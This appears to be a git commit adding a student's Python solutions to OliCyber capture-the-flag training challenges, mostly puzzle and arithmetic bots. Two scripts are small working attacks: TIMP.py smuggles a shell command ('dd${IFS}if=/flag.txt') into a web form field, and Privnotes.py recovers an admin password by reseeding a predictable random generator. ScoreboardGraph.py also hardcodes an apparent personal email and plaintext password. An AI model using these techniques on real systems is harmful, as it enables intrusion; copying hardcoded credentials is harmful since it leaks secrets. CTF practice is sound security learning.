first commit

2048.py

@@ -0,0 +1,36 @@
+from pwn import *
+
+host = "2048.challs.olicyber.it"
+port = 10007
+
+r = remote(host, port)
+print(r.recvuntil(b":"))
+
+q = log.progress("Question: ")
+ans = log.progress("Answer: ")
+
+def computeAnswer(type, arg1, arg2):
+    operations = {
+        "SOMMA": lambda a, b: a + b,
+        "DIFFERENZA": lambda a, b: a - b,
+        "PRODOTTO": lambda a, b: a * b,
+        "DIVISIONE": lambda a, b: a / b,
+        "POTENZA": lambda a, b: a ** b,
+        "DIVISIONE_INTERA": lambda a, b: a // b,
+    }
+    return operations[type](arg1, arg2)
+
+
+for i in range (0,2048): 
+    question = r.recv().decode("utf-8").strip()
+    q.status(str(i) + ":"+question)
+    if (len(question) == 0):
+        print("Error "+ r.recv().decode("utf-8"))
+        break
+    #q.status(question)
+    split = question.split(" ")
+    answer = computeAnswer(split[0], int(split[1]), int(split[2]))
+    ans.status(str(answer))
+    r.send(str(answer).encode("utf-8") + b"\n")
+print(r.recv().decode("utf-8"))
+

CHAOS/CHAOS.py

@@ -0,0 +1,43 @@
+import pyshark
+
+# Path al file pcap
+capture_file = '/home/sergio/ProgettiProgrammazione/Python/CyberChallenge/CHAOS/CHAOS.pcap'
+
+# filtro che vogliamo applicare
+display_filter = 'tcp.analysis.retransmission'
+
+# lista dei payload
+payloads = []
+
+# in questo caso prendo il valore del payload tcp
+def extract_payload(packet):
+    try:
+        return packet.tcp.payload.raw_value
+    except AttributeError:
+        return None
+
+# apro il pcap
+cap = pyshark.FileCapture(capture_file, display_filter=display_filter)
+
+packet_list = []
+
+# salvo i pacchetti in una lista per poterli ordinare in ordine cronologico
+for packet in cap:
+    packet_list.append(packet)
+#ordino i pacchetti in ordine cronologico
+packet_list.sort(key=lambda packet: packet.sniff_time)
+
+# estraggo i payload
+for packet in packet_list:
+    payload = extract_payload(packet)
+    if payload is not None:
+        payloads.append(payload)
+
+# chiudo il pcap
+cap.close()
+
+flag = ""
+# appendo i payload in una stringa
+for idx, payload in enumerate(payloads, start=1):
+    flag+= chr(int(payload, 16))
+print(flag)

Privnotes.py

@@ -0,0 +1,39 @@
+import requests
+import string
+import random
+import bs4
+import re
+
+url = "http://privnotes.challs.olicyber.it"
+login = "/login"
+register = "/register"
+users = "/users"
+notes = "/notes"
+
+def get_random_string(length):
+    # choose from all lowercase letter
+    letters = string.ascii_lowercase
+    result_str = ''.join(random.choice(letters) for i in range(length))
+    return result_str
+
+s = requests.Session()
+
+data = {
+    "username": get_random_string(7)
+}
+
+r = s.post(url + register, data=data)
+r = s.get(url + users)
+soup = bs4.BeautifulSoup(r.text, "html.parser")
+date = soup.find("time")
+date = date.get("raw")
+random.seed(float(date))
+password = "".join(random.choices(string.ascii_letters + string.digits, k=16))
+adminCredentials ={
+    "username": "admin",
+    "password": password
+}
+r = s.post(url + login, data=adminCredentials)
+r = s.get(url+ notes)
+flag = re.findall(r"flag\{[^}]*\}", r.text)
+print(flag[0])

ScoreboardGraph.py

@@ -0,0 +1,30 @@
+import requests
+import bs4
+from fake_useragent import UserAgent
+
+scoreboardUrl = "https://training.olicyber.it/scoreboard"
+
+loginUrl = "https://training.olicyber.it/login"
+
+r = requests.session()
+
+
+
+loginData = {
+    "email":"sergiocibecchini.productivity@gmail.com",
+    "password":"HJL4Pd&4q26$D8B@"
+}
+headers = {'User-Agent': str(UserAgent().chrome)}
+r.get(scoreboardUrl, headers=headers)
+answ = r.post(loginUrl,  headers=headers, data=loginData)
+
+print(answ.text)
+
+soup = bs4.BeautifulSoup(answ.text, 'html.parser')
+
+scoreTable =  soup.find('table', {'class': 'm-0 text-nowrap table table-striped table-bordered table-hover'})
+
+placeScoreDict = {}
+
+print(scoreTable)
+

TIMP.py

@@ -0,0 +1,18 @@
+import requests
+
+
+url = "http://timp.challs.olicyber.it"
+handler = "/handler.php"
+
+s = requests.Session()
+
+result = ""
+
+for i in range (5): 
+    payload = 'dd${IFS}if=/flag.txt${IFS}bs=1${IFS}skip='+str(i*10)
+    params = {
+    "cmd": payload
+    }
+    r = s.post(url+handler, data=params)
+    result += r.text
+print(result)

cicada 1337.py

@@ -0,0 +1,117 @@
+import subprocess
+import re
+
+
+def is_prime(number):
+    if number <= 1:
+        return False
+    elif number <= 3:
+        return True
+    elif number % 2 == 0 or number % 3 == 0:
+        return False
+
+    i = 5
+    while i * i <= number:
+        if number % i == 0 or number % (i + 2) == 0:
+            return False
+        i += 6
+
+    return True
+
+# Path to the image file
+image_path = "/home/sergio/Desktop/congratulations.png"
+
+# Construct the command as a list of arguments
+command = ["identify", "-verbose", image_path]
+
+# Execute the command and capture the output
+completed_process = subprocess.run(command, capture_output=True, text=True)
+
+# Get the captured output
+output = completed_process.stdout
+
+# Print or manipulate the captured output as needed
+print(output)
+
+numbers = re.findall(r'\s-?\b\d+\b\s', output)
+
+prime = []
+
+for number in numbers:
+    if is_prime(int(number)) and number not in prime:
+        prime.append(number)
+prime = prime[:3]
+num = 1
+for i in range (len(prime)): 
+    prime[i] = int(prime[i].strip())
+    num *= prime[i]
+
+print(prime)
+print(num)
+
+text = '''{A KOAN}
+A MAN DECIDED TO GO AND STUDY WITH A MASTER
+HE WENT TO THE DOOR OF THE MASTER
+"WHO ARE YOU WHO WISHES TO STUDY HERE" ASKED THE MASTER
+THE STUDENT TOLD THE MASTER HIS NAME
+"THAT IS NOT WHO YOU ARE, THAT IS ONLY WHAT YOU ARE CALLED
+WHO ARE YOU WHO WISHES TO STUDY HERE" HE ASKED AGAIN
+THE MAN THOUGHT FOR A MOMENT, AND REPLIED "I AM A PROFESSOR"
+"THAT IS WHAT YOU DO, NOT WHO YOU ARE," REPLIED THE MASTER
+"WHO ARE YOU WHO WISHES TO STUDY HERE"
+CONFUSED, THE MAN THOUGHT SOME MORE
+FINALLY, HE ANSWERED, "I AM A HUMAN BEING"
+"THAT IS ONLY YOUR SPECIES, NOT WHO YOU ARE
+WHO ARE YOU WHO WISHES TO STUDY HERE", ASKED THE MASTER AGAIN
+AFTER A MOMENT OF THOUGHT, THE PROFESSOR REPLIED "I AM A CONSCIOUSNESS INHABITING AN ARBITRARY BODY"
+"THAT IS MERELY WHAT YOU ARE, NOT WHO YOU ARE
+WHO ARE YOU WHO WISHES TO STUDY HERE"
+THE MAN WAS GETTING IRRITATED
+"I AM," HE STARTED, BUT HE COULD NOT THINK OF ANYTHING ELSE TO SAY, SO HE TRAILED OFF
+AFTER A LONG PAUSE THE MASTER REPLIED, "THEN YOU ARE WELCOME TO COME STUDY' '''
+
+# Split the text into an array where each row is an element
+text_array = text.split('\n')
+
+# Remove empty lines
+text_array = [line for line in text_array if line.strip()]
+
+# Print the resulting array
+for row in text_array:
+    print(row)
+
+indexes = [    
+    9, 43,
+    19, 50,
+    5, 35,
+    1, 1,
+    14, 41,
+    19, 10,
+    12, 11,
+    7, 44,
+    5, 23,
+    20, 11,
+    6, 58,
+    16, 22,
+    20, 63,
+    8, 12,
+    17, 27,
+    2, 34,
+    9, 4,
+    20, 34,
+    19, 57,
+    15, 35,
+    8, 44,
+    15, 80,
+    18, 29,
+    1, 8
+]
+
+flag = ""
+
+print(indexes[9])
+
+for i in range (0, len(indexes), 2):
+    flag += text_array[indexes[i] - 1][indexes[i + 1] - 1] 
+
+print(flag)

execute-me.py

@@ -0,0 +1,6 @@
+
+    # Open the binary file in read mode
+with open('/tmp/execute-me', 'rb') as file:
+        binary_data = file.read()
+        text_data = binary_data.decode('utf-8', errors='ignore')
+        print(text_data)

import requests.py

@@ -0,0 +1,9 @@
+import requests
+import re
+
+url = "http://roller.challs.olicyber.it/get_flag.php"
+
+
+r = requests.get(url, allow_redirects=False)
+
+print(re.findall(r'flag{.*}', r.text)[0])

infiniteServer.py

@@ -0,0 +1,80 @@
+import requests
+import bs4
+import re
+from pwn import *
+url = "http://infinite.challs.olicyber.it/"
+
+def makeRequest(): 
+    r = requests.get(url)
+    soup = bs4.BeautifulSoup(r.text, 'html.parser')
+    return soup
+
+def getType(soup):
+    question = soup.find('h2').text
+    split = question.split(" ")
+    return split[0]
+
+def getQuestion (soup):
+    question = soup.find('p').text
+    return question
+
+def solveGrammar (question): 
+    split = question.split('"')
+    letter = split[1]
+    word = split[3]
+    #number of letters in word
+    res = len(re.findall(letter, word))
+    data = {
+        'letter': res
+    }
+    return data
+def solveMath (question): 
+    split = question.split(" ")
+    num1 = int(split[2])
+    split[4] = split[4].replace("?", "")
+    num2 = int(split[4]) 
+    res = num1 + num2
+    data = {
+        'sum': str(res)
+    }
+    return data
+def solveArt (question): 
+    split = question.split(" ")
+    color = split[5].replace("?", "")
+    return color+"="
+
+r = requests.session()
+soup = makeRequest()
+
+q = log.progress("Question")
+a = log.progress("Answer")
+t = log.progress("Type")
+c = log.progress("Count")
+i = 0
+while(True): 
+    i+=1  
+    c.status(i)
+    type = getType(soup)
+    question = getQuestion(soup)
+    q.status(question)
+    t.status(type)
+    if type == "GRAMMAR":
+        data = solveGrammar(question)
+    elif type == "MATH":
+        data = solveMath(question)
+    elif type == "ART":
+        data = solveArt(question)
+    else: 
+        print("Error")
+    answ = r.post(url, data=data)
+    a.status(str(data))
+    if ("WRONG" in answ.text):
+        print("WRONG")
+        break
+    elif ("flag" in answ.text):
+        print("FLAG: "+answ.text)
+        break
+    soup = bs4.BeautifulSoup(answ.text, 'html.parser')
+
+
+